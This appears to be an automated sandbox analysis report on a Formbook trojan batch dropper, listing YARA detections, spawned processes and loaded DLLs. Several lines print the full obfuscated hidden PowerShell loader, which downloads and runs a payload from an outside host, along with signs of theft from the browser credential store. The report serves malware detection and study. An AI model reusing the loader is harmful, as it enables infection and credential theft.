          Source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@22/10@3/3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Coumarate.BicJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fatgl34k.okl.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rFV-452747284IN.bat" "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4324
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7108
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007544000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034173382.0000000002863000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034173382.0000000002867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rFV-452747284IN.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePan
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.tooJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
